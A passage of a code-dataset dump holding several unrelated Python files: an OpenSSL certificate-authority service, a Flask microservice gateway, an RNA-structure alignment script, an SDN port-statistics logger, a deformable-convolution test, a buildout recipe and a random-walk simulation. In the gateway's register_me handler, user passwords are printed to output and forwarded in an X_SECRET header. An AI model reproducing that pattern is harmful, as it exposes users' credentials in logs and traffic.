{filename}').format(openssl=settings.OPENSSL_PATH, 
cfg=conf_path, filename=fd.name))\n key_filename = os.path.join(self.dirname, infos[5])\n if os.path.isfile(key_filename):\n with open(key_filename, b'rb') as (fd):\n content = fd.read()\n os.remove(key_filename)\n with open(key_filename + b'.bak', b'ab') as (fd):\n fd.write(content)\n req_filename = os.path.join(self.dirname, infos[6])\n if os.path.isfile(req_filename):\n os.remove(req_filename)\n crt_filename = os.path.join(self.dirname, infos[7])\n if os.path.isfile(crt_filename):\n os.remove(crt_filename)\n if regen_crl:\n with Lock(settings.PENATES_LOCKFILE):\n self.__gen_crl(20)\n\n @staticmethod\n def __get_certificate_serial(filename):\n cmd = [settings.OPENSSL_PATH, b'x509', b'-serial', b'-noout', b'-in', filename]\n serial_text = subprocess.check_output(cmd, stderr=subprocess.PIPE).decode(b'utf-8')\n matcher = re.match(b'^serial=([\\\\dA-F]+)$', serial_text.strip())\n if not matcher:\n return None\n else:\n return matcher.group(1)\n\n def ensure_crl(self):\n if not self.__check_crl():\n with Lock(settings.PENATES_LOCKFILE):\n self.__gen_crl(20)\n\n def __check_crl(self):\n try:\n content = subprocess.check_output([settings.OPENSSL_PATH, b'crl', b'-noout', b'-nextupdate', b'-in',\n self.cacrl_path], stderr=subprocess.PIPE)\n except CalledProcessError:\n return False\n\n key, sep, value = content.decode(b'utf-8').partition(b'=')\n if key != b'nextUpdate' or sep != b'=':\n return False\n return t61_to_time(value.strip()) > datetime.datetime.now(utc) + datetime.timedelta(seconds=86400)\n\n def __gen_crl(self, crldays):\n config = self.__gen_openssl_conf()\n content = subprocess.check_output([settings.OPENSSL_PATH, b'ca', b'-gencrl', b'-utf8', b'-config', config,\n b'-keyfile', self.cakey_path, b'-cert', self.cacrt_path, b'-crldays',\n str(crldays)], stderr=subprocess.PIPE)\n with open(self.cacrl_path, b'wb') as (fd):\n fd.write(content)\n\n def __get_index_file(self):\n \"\"\"Return a dict [\"serial\"] = [\"serial\", \"V|R\", \"valid_date\", \"revoke_date\", \"cn\", \"key filename\",\n \"req filename\", \"crt filename\"]\n :return:\n :rtype:\n \"\"\"\n result = {}\n with codecs.open(os.path.join(self.dirname, b'index.txt'), b'r', encoding=b'utf-8') as (fd):\n for line in fd:\n if not line:\n continue\n state, valid_date, revoke_date, serial, unused, cn = line.split(b'\\t')\n result[serial] = [serial, state, valid_date, revoke_date, cn, None, None, None]\n\n if os.path.isfile(self.crt_sources_path):\n with codecs.open(self.crt_sources_path, b'r', encoding=b'utf-8') as (fd):\n for line in fd:\n if not line:\n continue\n serial, key, req, crt = line.split(b'\\t')\n result[serial][5] = key\n result[serial][6] = req\n result[serial][7] = crt\n\n return result\n\n def gen_pkcs12(self, entry, filename, password):\n assert isinstance(entry, CertificateEntry)\n self.ensure_certificate(entry)\n with tempfile.NamedTemporaryFile() as (fd):\n fd.write(password.encode(b'utf-8'))\n fd.flush()\n p = subprocess.Popen([settings.OPENSSL_PATH, b'pkcs12', b'-export', b'-out', filename, b'-passout',\n b'file:%s' % fd.name, b'-aes256', b'-in', entry.crt_filename, b'-inkey',\n entry.key_filename, b'-certfile', self.cacrt_path, b'-name', entry.filename])\n p.communicate()","sub_path":"pycfiles/penatesserver-0.7.1.tar/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":25617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"32888753","text":"import json\nimport requests\nfrom requests.exceptions import ConnectionError\nfrom flask 
import Flask, request, redirect\nfrom utils import send_error, send_response, clean_hh, proxy_to\n\n\napp = Flask(__name__)\n\n\nCOMPANY_SERVICE_URL = 'http://127.0.0.1:9092/'\nROUTE_SERVICE_URL = 'http://127.0.0.1:9093/'\nSESSIONS_SERVICE_URL = 'http://127.0.0.1:9091/'\nAGGREGATOR_SERVICE_URL = 'http://127.0.0.1:9094/'\n\n\n@app.route('/login/', methods=['GET', 'POST'])\ndef login_proxy():\n return proxy_to(request, SESSIONS_SERVICE_URL + 'login/')\n\n\n@app.route('/register/', methods=['GET', 'POST'])\ndef register_proxy():\n return proxy_to(request, SESSIONS_SERVICE_URL + 'register/')\n\n\n@app.route('/authorize/', methods=['GET', 'POST'])\ndef authorize_proxy():\n return proxy_to(request, SESSIONS_SERVICE_URL + 'authorize/')\n\n\n@app.route('/token/', methods=['POST'])\ndef access_token_proxy():\n return proxy_to(request, SESSIONS_SERVICE_URL + 'token/')\n\n\n@app.route('/me/', methods=['GET'])\ndef personal_view():\n try:\n response = requests.get(SESSIONS_SERVICE_URL + 'identify/', headers=clean_hh(request))\n if response.status_code != 200:\n return send_error(request, 403)\n except ConnectionError as e:\n return send_response(request, {'status': 'Session service is down'})\n \n user = response.json()['data']\n headers = {'X_EMAIL': user['email']}\n try:\n response = requests.get(COMPANY_SERVICE_URL + 'companies/', headers=headers)\n if response.status_code == 200:\n companies = json.loads(response.text)\n user['companies'] = companies['data']\n except ConnectionError as e:\n user['companies'] = {'error': 'Company service is down'}\n\t\n try:\n response = requests.get(ROUTE_SERVICE_URL + 'my_routes/', headers=headers)\n if response.status_code == 200:\n routes = json.loads(response.text)\n user['routes'] = routes['data']\n except ConnectionError as e:\n user['routes'] = {'error': 'Routes service is down'}\n\n return send_response(request, {'status': 'OK', 'data': user})\n\n# problem\n@app.route('/route/<route_id>/register/', methods=['POST'])\ndef register_me(route_id):\n try:\n response = requests.get(SESSIONS_SERVICE_URL + 'identify/', headers=clean_hh(request))\n if response.status_code != 200:\n return send_error(request, 403)\n except ConnectionError:\n return send_response(request, {'status': 'Session service is down'})\n \n \n\n user = response.json()['data']\n print({'USER': user})\n \n headers = {}\n \n headers.update({\n 'X_EMAIL': user['email'],\n\t\t'X_SECRET': user['password'],\n\t})\n\t\n print({'HEADERS': headers})\n\t\n try:\n response = requests.post(ROUTE_SERVICE_URL + 'route/%s/register/' % route_id, headers=headers)\n if response.status_code == 200:\n return send_response(request, {'status': 'OK'})\n return send_error(request, response.status_code)\n except ConnectionError:\n return send_response(request, {'status': 'Route service is down'})\n\n\nif __name__ == '__main__':\n app.run(host='127.0.0.1', port=9094)\n","sub_path":"lr3_micros/front/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"649187838","text":"import os\nimport re\nfrom filecmp import dircmp\nfrom pathlib import Path\nimport numpy as np\nfrom Bio.PDB import PDBParser\n\nimport unittest\nimport sys\nsys.path.append(\"..\")\nfrom Bio.Seq import Seq\nfrom Bio.SeqRecord import SeqRecord\nfrom Bio.Alphabet import IUPAC, SingleLetterAlphabet\nimport forgi.graph.bulge_graph as fgb\nimport forgi.utilities.debug as fud\nfrom forgi.utilities.exceptions import GraphConstructionError\nimport 
forgi.utilities.stuff as fus\nimport forgi.threedee.model.coarse_grain as ftmc\n\npunktacja = {'dopasowanie':1, 'niedopasowanie':-1, 'przerwa':-1}\ndef pobranie_PDB():\n print(\"PDB\")\ndef funkcja(string, tmplista):\n parser = PDBParser()\n structure = parser.get_structure('X', string)\n model=structure[0]\n for chain in model:\n tmplista.append([string[-8:-4],chain])\ndef sprawdzDopasowanie(x, y):\n if x == y:\n return punktacja['dopasowanie']\n elif x == \"-\" or y == \"-\":\n return punktacja['przerwa']\n else:\n return punktacja['niedopasowanie']\n\ndef NeedlemanWunsch(seq1, seq2, wyniki):\n m, n = len(seq1), len(seq2)\n punkty = np.zeros((m+1, n+1)) \n # Matrix initialization phase---------------------------------------------------------\n for i in range(m+1):\n punkty[i][0] = punktacja['przerwa'] * i\n for j in range(n+1):\n punkty[0][j] = punktacja['przerwa'] * j\n # Filling in the scoring matrix-------------------------------------------------------\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n przek = punkty[i-1][j-1] + sprawdzDopasowanie(seq1[i-1], seq2[j-1])\n D = punkty[i-1][j] + punktacja['przerwa']\n I = punkty[i][j-1] + punktacja['przerwa']\n punkty[i][j] = max(przek, D, I)\n i = m\n j = n\n dopasowanie_1 = \"\" \n dopasowanie_2 = \"\"\n # Traceback through the matrix-----------------------------------------------------------\n while (i>0 and j>0):\n punkty_teraz = punkty[i][j]\n punkty_przek = punkty[i-1][j-1]\n punkty_L = punkty[i][j-1]\n punkty_gora = punkty[i-1][j]\n \n if punkty_teraz == punkty_przek + sprawdzDopasowanie(seq1[i-1], seq2[j-1]):\n dop_1 = seq1[i-1]\n dop_2 = seq2[j-1]\n i = i-1\n j = j-1\n elif punkty_teraz == punkty_gora + punktacja['przerwa']:\n dop_1 = seq1[i-1]\n dop_2 = \"-\"\n i -= 1\n elif punkty_teraz == punkty_L + punktacja['przerwa']:\n dop_1 = \"-\"\n dop_2 = seq2[j-1]\n j -= 1\n dopasowanie_1+=dop_1\n dopasowanie_2+=dop_2\n \n while i>0:\n dop_1 = seq1[i-1]\n dop_2 = \"-\"\n dopasowanie_1+=dop_1\n dopasowanie_2+=dop_2\n i -= 1\n while j>0:\n dop_1 = \"-\"\n dop_2 = seq2[j-1]\n dopasowanie_1+=dop_1\n dopasowanie_2+=dop_2\n j -= 1\n \n dopasowanie_1 = dopasowanie_1[::-1]\n dopasowanie_2 = dopasowanie_2[::-1]\n sekwencja = len(dopasowanie_1)\n punktacjaSekwencji = 0\n identycznosc = 0\n for i in range(sekwencja):\n dop_1 = dopasowanie_1[i]\n dop_2 = dopasowanie_2[i]\n if dop_1 == dop_2:\n identycznosc += 1\n punktacjaSekwencji += sprawdzDopasowanie(dop_1, dop_2)\n else: \n punktacjaSekwencji += sprawdzDopasowanie(dop_1, dop_2)\n \n identycznosc = identycznosc/sekwencja * 100\n wy = ' '.join(['Po dopasowaniu', '\\nsekwencja 1:', str(dopasowanie_1), '\\nsekwencja 2:', str(dopasowanie_2), '\\nProcent identycznosci:', str(identycznosc), '\\nPunktacja:', str(punktacjaSekwencji), '\\n'])\n wyniki.write(wy)\n\n print(\"Po dopasowaniu\")\n print(\"sekwencja 1:\",dopasowanie_1)\n print(\"sekwencja 2:\",dopasowanie_2)\n print(\"Procent identycznosci: %2.1f\" % identycznosc)\n print(\"Punktacja:\", punktacjaSekwencji)\n \n return identycznosc\n\n \n\ndef metrykaGory(S1, S2):\n vS1 = []\n vS2 = []\n S1c = 0\n S2c = 0\n\n for j in S1:\n if j == '(': \n S1c+=1\n vS1.append(S1c)\n elif j == ')':\n S1c-=1\n vS1.append(S1c)\n else:\n vS1.append(S1c)\n\n for j in S2:\n if j == '(': \n S2c+=1\n vS2.append(S2c)\n elif j == ')':\n S2c-=1\n vS2.append(S2c)\n else:\n vS2.append(S2c)\n\n return abs(sum(vS1)-sum(vS2))\n\ndef metryka(s1, s2): # percent of mismatched positions\n if len(s1)!=len(s2):\n return 100\n d=0\n for i in range(len(s1)):\n if s1[i]!=s2[i]:\n 
d=d+1\n return 100*d/len(s1)\ndef hamming_distance(s1, s2):\n if len(s1) != len(s2):\n raise ValueError(\"Undefined for sequences of unequal length\")\n return sum(ch1 != ch2 for ch1, ch2 in zip(s1, s2))\ndef get_pdb_file(PDBlist2,path):\n pdbl = PDBList()\n for i in PDBlist2:\n #pdbl.retrieve_pdb_file(i)\n pdbl.retrieve_pdb_file(i, file_format=\"pdb\",pdir=path)\n #pdbl.update_pdb()\ndef convert_pdb_to_fasta_tring(pdb_file):\n cg = ftmc.from_pdb(pdb_file)\n return cg.to_fasta_string()\n \ndef check_lancuchow(pdb_file):\n amino_code = {\n\t'ALA':'A', 'ARG':'R', 'ASN':'N', 'ASP':'D',\n\t'CYS':'C', 'GLN':'Q', 'GLU':'E', 'GLY':'G',\n\t'ILE':'I', 'LEU':'L', 'LYS':'K', 'MET':'M',\n\t'PHE':'F', 'PRO':'P', 'SER':'S', 'THR':'T',\n\t'TRP':'W', 'TYR':'Y', 'VAL':'V', 'HIS':'H',\n\t'ASX':'B', 'GLX':'Z', 'UNK':'K'\n }\n fa = {}\n with open(pdb_file) as fh:\n for buff in fh:\n if (buff[0:4] != 'ATOM'):\n continue\n chain_name = buff[21:22]\n res_number = int(buff[22:26])\n amino_acid = buff[17:20]\n if not (chain_name in fa):\n fa[chain_name] = []\n aa = 'X'\n if (amino_acid in amino_code):\n aa = amino_code[amino_acid]\n if (len(fa[chain_name]) != res_number):\n fa[chain_name] += ['X'] * (res_number - len(fa[chain_name]))\n fa[chain_name][res_number - 1] = aa\n for k, v in sorted(fa.items()):\n\t#print (len(k))\n if not(len(fa) >=2 and set(''.join(v))=={'X'}): \n return False\n return True\n\ndef drzewoDFS(elem):\n print(\"wejscie: \", elem)\n\n #return wyjscie\ndef utworzZbiorZPliku(sciezka):\n f = open(sciezka, \"r\")\n print(f.name)\n struktury = []\n \n for lin in f:\n struktury.append(lin)\n return struktury\nif __name__ == \"__main__\":\n path = Path('/pdb')\n lista = list(path.glob('**/*.ent'))\n\n sciezka='/pdb'\n parser = PDBParser()\n \n import Bio\n from Bio.PDB import PDBList\n listaLancuchow=[]\n PDBlist1=[]\n \n PDBlist=['1EVV','1EHZ','1ESY','1DDY','2G1W','1ALK','2lbk','3g78','4jkw']\n #pdbl = PDBList()\n get_pdb_file(PDBlist,path)\n for i in lista:\n if check_lancuchow(i) is True:\n PDBlist1.append(i)\n print(i)\n lista_struktury = 'pdb/Struktury.txt'\n listy_struktury = utworzZbiorZPliku(lista_struktury)\n bg1 = fgb.BulgeGraph()\n bg2 = fgb.BulgeGraph()\n \n _1evv_ ='(((((((..((((.....[..)))).((((.........)))).....(((((..]....))))))))))))....'\n _1ehz_ ='(((((((..((((.....[..)))).((((.........)))).....(((((..]....))))))))))))....'\n _1esy_ = '((((.((....))..))))'\n _1ddy_ ='......[[[.{((....((]]]...).).}.))..'\n _2g1w_ = '((((.[[..))))......]]'\n _2lbk_ ='.(((((.....))))).'\n _1clq_ ='(((((......(((....(((....)))....)))...)))))'\n _1f7g_ ='((((((.(((((....)))))))))))'\n _1f79_ ='.(((((.(((((....)))))))))).'\n listy = list([_1evv_,_1ehz_,_1esy_,_1ddy_,_2g1w_,_2lbk_,_1f7g_,_1f79_])\n bg = fgb.BulgeGraph()\n path_wynik =r\"wynik/wyniki.txt\"\n \n wyniki = open(path_wynik, \"w\")\n #wyj=''\n for ind, z in enumerate(listy):\n bg.from_dotbracket(z)\n elem_str = bg.to_element_string()\n print(\"struktury\",ind+1,\":\", z)\n print(\" \",elem_str)\n wyj = ' '.join(['struktury',str(ind+1),':', str(z) , '\\n',' ',str(elem_str)])\n #wyniki.write(wyj)\n #wynik1 =''\n for ind, z in enumerate(listy):\n for ind2, z2 in enumerate(listy):\n if ind == ind2:\n continue\n bg1.from_dotbracket(z)\n elem_str1 = bg1.to_element_string()\n bg2.from_dotbracket(z2)\n elem_str2 = bg2.to_element_string()\n print(\"=============================================================================================\\n\")\n print(\"odleglosc struktury\", ind+1, \"od struktury\", ind2+1, \"wynosi\")\n NeedlemanWunsch(elem_str1, 
elem_str2, wyniki)\n print(\"metryka gory:\", metrykaGory(z, z2))\n print(\"metryka procent niezgodnych pozycji:\",metryka(z, z2))\n print(\"=============================================================================================\\n\")\n ##wyniki.write(wynik1)\n","sub_path":"Zad1_Bioinformatyka.py","file_name":"Zad1_Bioinformatyka.py","file_ext":"py","file_size_in_byte":8970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"115603319","text":"import requests\nimport csv\nimport json\nimport time\n\narray_num = 1\n\n# Create csn file\ncsv_open = csv.writer(open(\"attack2.csv\",\"wb+\"))\ncsv_open.writerow([\"port_no\",\n \"rx_packets\",\n \"tx_packets\",\n \"rx_bytes\",\n \"tx_bytes\",\n \"rx_dropped\",\n \"tx_dropped\",\n \"rx_errors\",\n \"tx_errors\",\n \"rx_frame_err\",\n \"rx_over_err\",\n \"rx_crc_err\",\n \"collisions\",\n \"duration_sec\",\n \"duration_nsec\"\n ])\n\nlatest_rx_packets = 0\nlatest_tx_packets = 0\nlatest_rx_bytes = 0\nlatest_tx_bytes = 0\nlatest_rx_dropped = 0\nlatest_tx_dropped = 0\nlatest_rx_errors = 0\nlatest_tx_errors = 0\nlatest_rx_frame_err = 0\nlatest_rx_over_err = 0\nlatest_rx_crc_err = 0\nlatest_collisions = 0\nlatest_duration_sec = 0\nlatest_duration_nsec = 0\n\npenultimate_rx_packets = 0\npenultimate_tx_packets = 0\npenultimate_rx_bytes = 0\npenultimate_tx_bytes = 0\npenultimate_rx_dropped = 0\npenultimate_tx_dropped = 0\npenultimate_rx_errors = 0\npenultimate_tx_errors = 0\npenultimate_rx_frame_err = 0\npenultimate_rx_over_err = 0\npenultimate_rx_crc_err = 0\npenultimate_collisions = 0\npenultimate_duration_sec = 0\npenultimate_duration_nsec = 0\n\ndiff_rx_packets = 0\ndiff_tx_packets = 0\ndiff_rx_bytes = 0\ndiff_tx_bytes = 0\ndiff_rx_dropped = 0\ndiff_tx_dropped = 0\ndiff_rx_errors = 0\ndiff_tx_errors = 0\ndiff_rx_frame_err = 0\ndiff_rx_over_err = 0\ndiff_rx_crc_err = 0\ndiff_collisions = 0\ndiff_duration_sec = 0\ndiff_duration_nsec = 0\n\n# Write to file\nfor x in range (20):\n print(x)\n time.sleep(1)\n\n # Send request\n response = requests.get('http://localhost:8080/stats/port/1')\n\n if response.status_code != 200:\n print(\"Failed to get data: \", response.status_code)\n else:\n data = response.json()\n\n penultimate_rx_packets = latest_rx_packets\n penultimate_tx_packets = latest_tx_packets\n penultimate_rx_bytes = latest_rx_bytes\n penultimate_tx_bytes = latest_tx_bytes\n penultimate_rx_dropped = latest_rx_dropped\n penultimate_tx_dropped = latest_tx_dropped\n penultimate_rx_errors = latest_rx_errors\n penultimate_tx_errors = latest_tx_errors\n penultimate_rx_frame_err = latest_rx_frame_err\n penultimate_rx_over_err = latest_rx_over_err\n penultimate_rx_crc_err = latest_rx_crc_err\n penultimate_collisions = latest_collisions\n penultimate_duration_sec = latest_duration_sec\n penultimate_duration_nsec = latest_duration_nsec\n\n latest_rx_packets = data[\"1\"][array_num][\"rx_packets\"]\n latest_tx_packets = data[\"1\"][array_num][\"tx_packets\"]\n latest_rx_bytes = data[\"1\"][array_num][\"rx_bytes\"]\n latest_tx_bytes = data[\"1\"][array_num][\"tx_bytes\"]\n latest_rx_dropped = data[\"1\"][array_num][\"rx_dropped\"]\n latest_tx_dropped = data[\"1\"][array_num][\"tx_dropped\"]\n latest_rx_errors = data[\"1\"][array_num][\"rx_errors\"]\n latest_tx_errors = data[\"1\"][array_num][\"tx_errors\"]\n latest_rx_frame_err = data[\"1\"][array_num][\"rx_frame_err\"]\n latest_rx_over_err = data[\"1\"][array_num][\"rx_over_err\"]\n latest_rx_crc_err = data[\"1\"][array_num][\"rx_crc_err\"]\n 
latest_collisions = data[\"1\"][array_num][\"collisions\"]\n latest_duration_sec = data[\"1\"][array_num][\"duration_sec\"]\n latest_duration_nsec = data[\"1\"][array_num][\"duration_nsec\"]\n\n diff_rx_packets = latest_rx_packets - penultimate_rx_packets\n diff_tx_packets = latest_tx_packets - penultimate_tx_packets\n diff_rx_bytes = latest_rx_bytes - penultimate_rx_bytes\n diff_tx_bytes = latest_tx_bytes - penultimate_tx_bytes\n diff_rx_dropped = latest_rx_dropped - penultimate_rx_dropped\n diff_tx_dropped = latest_tx_dropped - penultimate_tx_dropped\n diff_rx_errors = latest_rx_errors - penultimate_rx_errors\n diff_tx_errors = latest_tx_errors - penultimate_tx_errors\n diff_rx_frame_err = latest_rx_frame_err - penultimate_rx_frame_err\n diff_rx_over_err = latest_rx_over_err - penultimate_rx_over_err\n diff_rx_crc_err = latest_rx_crc_err - penultimate_rx_crc_err\n diff_collisions = latest_collisions - penultimate_collisions\n diff_duration_sec = latest_duration_sec - penultimate_duration_sec\n diff_duration_nsec = latest_duration_nsec - penultimate_duration_nsec\n\n\n csv_open.writerow([data[\"1\"][array_num][\"port_no\"],\n diff_rx_packets,\n diff_tx_packets,\n diff_rx_bytes,\n diff_tx_bytes,\n diff_rx_dropped,\n diff_tx_dropped,\n diff_rx_errors,\n diff_tx_errors,\n diff_rx_frame_err,\n diff_rx_over_err,\n diff_rx_crc_err,\n diff_collisions,\n diff_duration_sec,\n diff_duration_nsec])\n","sub_path":"data_mining_scripts/port/old/sdn_port_timed.py","file_name":"sdn_port_timed.py","file_ext":"py","file_size_in_byte":5326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"411782031","text":"\r\nimport _init_paths\r\nimport torch\r\nimport torch.nn as nn\r\nfrom models.networks.DCNv2.dcn_v2 import DCNv2, DCN, dcn_v2_conv\r\nfrom models.networks.corner_pool_utils import RCN_NEW, RCN_NEW_XV\r\nfrom models.networks.DCNv2_xv.modules.modulated_deform_conv import ModulatedDeformConv\r\nimport numpy as np\r\n\r\nkH = 3\r\nkW = 1\r\nkernel = (kH,kW)\r\npH = 1\r\npW = 0\r\npadding = (pH,pW)\r\niH = iW = 3\r\noH = (iH + 2 * pH - kH)//1 +1\r\noW = (iW + 2 * pW - kW)//1 +1\r\n\r\ndeformable_groups = 1\r\nN, inC, inH, inW = 1, 1, 3, 3\r\noutC = 1\r\ndef check_mdconv_zero_offset():\r\n conv_offset = nn.Conv2d(inC, deformable_groups * 2 * kH * kW,\r\n kernel_size=(kH, kW),\r\n stride=(1, 1),\r\n padding=(pH, pW),\r\n bias=True).cuda()\r\n\r\n conv_mask = nn.Conv2d(inC, deformable_groups * 1 * kH * kW,\r\n kernel_size=(kH, kW),\r\n stride=(1, 1),\r\n padding=(pH, pW),\r\n bias=True).cuda()\r\n\r\n dcn = ModulatedDeformConv(inC, outC, (kH, kW),\r\n stride=1, padding=(pH, pW), dilation=1,\r\n groups=1,\r\n deformable_groups=deformable_groups, im2col_step=1).cuda()\r\n pcn = nn.Conv2d(inC, outC, (kH, kW), stride=1, padding=(pH, pW), dilation=1, groups=1).cuda()\r\n pcn.weight = dcn.weight\r\n pcn.bias = dcn.bias\r\n print((pcn.weight.data - dcn.weight.data).abs().max())\r\n\r\n conv_offset.weight.data.zero_()\r\n conv_offset.bias.data.zero_()\r\n conv_mask.weight.data.zero_()\r\n conv_mask.bias.data.zero_()\r\n\r\n input = torch.randn(N, inC, inH, inW).cuda()\r\n offset = conv_offset(input)\r\n mask = conv_mask(input)\r\n mask = torch.sigmoid(mask)\r\n mask *= 2\r\n output_d = dcn(input, offset, mask)\r\n output_p = pcn(input)\r\n d = (output_d - output_p).abs().max()\r\n if d < 1e-5:\r\n print('mdconv zero offset passed with {}'.format(d))\r\n else:\r\n print('mdconv zero offset failed with {}'.format(d))\r\n # print(output_p)\r\n # print(output_d)\r\n 
print((output_d - output_p).abs())\r\n\r\n# check_mdconv_zero_offset()\r\ntest_rcn_xv = RCN_NEW_XV(1, 1, kernel, stride=1, padding=padding, bias=False).cuda()\r\n\r\ninput = torch.arange(0,iH*iW).view(1,1,iH,iW).cuda().float()\r\ninput[0,0,2,1] = 9\r\ninput[0,0,1,2] = 10\r\nnn.init.constant_(test_rcn_xv.weight, 1.0)\r\nangle = torch.zeros_like(input)\r\n# offset = [0,0,0,0,0,0,0,0,0,0]\r\noffset = [0,0,0,0,0,0]\r\noffset = torch.Tensor(offset).view(2*kH*kW,1)\r\noffset = offset.expand(2*kH*kW,oH*oW).contiguous().view(-1).view(1,2*kH*kW,oH,oW).cuda()\r\nmask = torch.ones(N,kH*kW,oH,oW).cuda()\r\noutput_xv = test_rcn_xv(input, angle, offset, mask)\r\n\r\n# offset1 = [-2,2,-1,1,0,0,1,-1,2,-2]\r\n# offset1 = [-1,1,0,0,1,-1]\r\noffset1 = [1,1,0,0,-1,-1]\r\noffset1= torch.Tensor(offset1).view(2*kH*kW,1)\r\noffset1 = offset1.expand(2*kH*kW,oH*oW).contiguous().view(1,2*kH*kW,oH,oW).cuda()\r\noutput1_xv = test_rcn_xv(input, angle, offset1, mask)\r\n\r\n\r\nangle1 = torch.ones_like(input)*np.pi*0.5\r\noutput1_ang_xv = test_rcn_xv(input, angle1)\r\n\r\nangle2 = torch.ones_like(input)*np.pi*1.0\r\noutput2_ang_xv = test_rcn_xv(input, angle2)\r\n\r\nangle3 = torch.ones_like(input)*np.pi*1.5\r\noutput3_ang_xv = test_rcn_xv(input, angle3)\r\n\r\n\r\n# weight = torch.Tensor([1,0,0,1,0,0,1,0,0]).view(1,1,3,3,).cuda()\r\n# test_rcn.weight.data=weight\r\n# output3 = test_rcn(input, angle)\r\n# output4 = test_rcn(input, angle1)\r\n#\r\n# angle2 = torch.ones_like(input)*np.pi*1.0\r\n# output5 = test_rcn(input, angle2)\r\n#\r\n# angle3 = torch.ones_like(input)*np.pi*1.5\r\n# output6 = test_rcn(input, angle3)\r\n\r\nprint('done.')","sub_path":"src/test_dcn_v2.py","file_name":"test_dcn_v2.py","file_ext":"py","file_size_in_byte":3656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"378386167","text":"import os\nimport logging\n\n# needed for zc.buildout.UserError raised below\nimport zc.buildout\n\nclass Mkdir:\n\n def __init__(self, buildout, name, options):\n self.buildout = buildout\n self.name = name\n self.options = options\n options['path'] = os.path.join(\n buildout['buildout']['directory'],\n options['path'],\n )\n if not os.path.isdir(os.path.dirname(options['path'])):\n logging.getLogger(self.name).error(\n 'Cannot create %s. 
%s is not a directory.',\n options['path'], os.path.dirname(options['path']))\n raise zc.buildout.UserError('Invalid Path')\n\n def install(self):\n path = self.options['path']\n if not os.path.isdir(path):\n logging.getLogger(self.name).info(\n 'Creating directory %s', os.path.basename(path))\n os.mkdir(path)\n return ()\n\n def update(self):\n pass\n\n","sub_path":"lovely.recipe/tags/0.3.1b1/src/lovely/recipe/fs/mkdir.py","file_name":"mkdir.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"104726505","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport argparse\n\ndef main(args):\n\t# Get command line arguments\n\twalk = args.walk\n\tcar = args.car\n\texample = args.example\n\tx0 = args.x0\n\tabort = False\n\n\tif walk == True:\n\t\t# Load example data or data given by user\n\t\tif example:\n\t\t\tT = [50,100,200,300]\n\t\t\tnu = [0.005,0.01,0.05,0.1]\n\t\telse:\n\t\t\tT = args.T\n\t\t\tnu = args.n\n\t\t\tif T is None:\n\t\t\t\tprint('Please enter at least one target point in time or set to --example')\n\t\t\t\tabort = True\n\t\t\tif nu is None:\n\t\t\t\tprint('Please enter at least one noise variance or set to --example')\n\t\t\t\tabort = True\n\n\t\t# If user has given reasonable data, continue\n\t\tif not abort:\n\t\t\t# Initialize grid for plotting\n\t\t\tf, axarr = plt.subplots(len(T),len(nu))\n\n\t\t\t# Loop over every target point in time\n\t\t\tfor i,target in enumerate(T):\n\t\t\t\t# Create time vector from 1 (0) until target for looping (plotting)\n\t\t\t\tx = np.arange(start = 1, stop=target)\n\t\t\t\tx_plot = np.arange(start = 0, stop=target)\n\n\t\t\t\t# Loop over every noise variance\n\t\t\t\tfor j,var in enumerate(nu):\n\t\t\t\t\t# Start at x_0\n\t\t\t\t\trandom_walk = [x0]\n\n\t\t\t\t\t# Loop over time\n\t\t\t\t\tfor step in x:\n\t\t\t\t\t\t# Compute optimal control and draw random noise from Gaussian, save in random_walk\n\t\t\t\t\t\tu_star = (np.tanh(random_walk[-1]/var*(target-step))-random_walk[-1])/(target-step)\n\t\t\t\t\t\txi = np.random.normal(loc=0.0, scale=var, size=None)\n\t\t\t\t\t\trandom_walk.append(u_star + xi)\n\n\t\t\t\t\t# Plot random walk and target locations\n\t\t\t\t\taxarr[i,j].plot(x_plot,random_walk)\n\t\t\t\t\taxarr[i,j].plot(x_plot,np.ones((len(random_walk),1)))\n\t\t\t\t\taxarr[i,j].plot(x_plot,(-1)*np.ones((len(random_walk),1)))\n\t\t\t\t\taxarr[i,j].set_xlabel('Timesteps ' + r'$t$')\n\t\t\t\t\taxarr[i,j].set_ylabel('Location ' + r'$x$')\n\t\t\t\t\taxarr[i,j].set_title(r'$T$' + '=' + str(T[i]) +' ' r'$\\nu$'+ '=' + str(nu[j]))\n\n\t\t\tf.suptitle('Random walk with dynamics ' + r'$dx = udt+d\\xi$' + '\\n' + 'Optimal control is ' + r'$u*(x,t)=\\frac{tanh(\\frac{x}{\\nu(T-t)})-x}{T-t}$' + '\\n' + 'Target location at ' + r'$t=T$' + ' is ' + r'$x = \\pm 1$'\n\t\t\t\t, fontsize=14)\n\t\t\tplt.show()\n\telif car == True:\n\t\tprint('car')\n\telse:\n\t\tprint('Please choose one exercise you want to execute')\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser(description='Simulate a controlled random walk in one dimension')\n\tparser.add_argument('--walk', dest='walk', action='store_true', help='Set to execute random walk exercise')\n\tparser.set_defaults(walk=False)\n\tparser.add_argument('--car', dest='car', action='store_true', help='Set to execute mountain car exercise')\n\tparser.set_defaults(car=False)\n\tparser.add_argument('--example', dest='example', action='store_true', help='Set to execute with example 
